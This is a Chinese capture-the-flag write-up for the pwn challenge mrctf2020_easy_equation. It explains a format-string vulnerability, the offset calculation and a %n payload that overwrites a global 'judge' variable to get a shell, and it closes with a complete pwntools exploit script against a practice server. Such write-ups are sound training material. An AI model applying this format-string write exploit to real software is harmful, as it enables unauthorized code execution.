mrctf2020_easy_equation
附件
步骤
- 例行检查,64位程序,只开启了nx保护
- 本地试运行一下,看看大概的情况,%p,那边,明显的格式化字符串漏洞
- 64位ida载入
只要满足第8行的条件即可获取shell,python算一下得到结果是2
所以这题是用格式化字符串漏洞,将judge上的值修改称即可
利用过程
- 确定偏移量,补了一个b之后偏移是8
由于64位传参,肯定存在被/x00截断的情况,所以我动调看了一下
我们要做的是将judge里的值修改成2,一开始我是这样写的,payload = "BB%8$n"+p64(judge)
,动调看一下,偏移应该是9
被/x00截断了,而且偏移也不对,重新写成payload = "BB%9$nAAA"+p64(judge)
%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置
bb%9$n:将2赋值到judge地址上,aaa是我用来补占位的
完整exp
from pwn import *
context.log_level='debug'
p = remote("node3.buuoj.cn",25534)
#p = process("./mrctf2020_easy_equation")
judge = 0x060105C
payload = "BB%9$nAAA"+p64(judge)
p.sendline(payload)
p.interactive()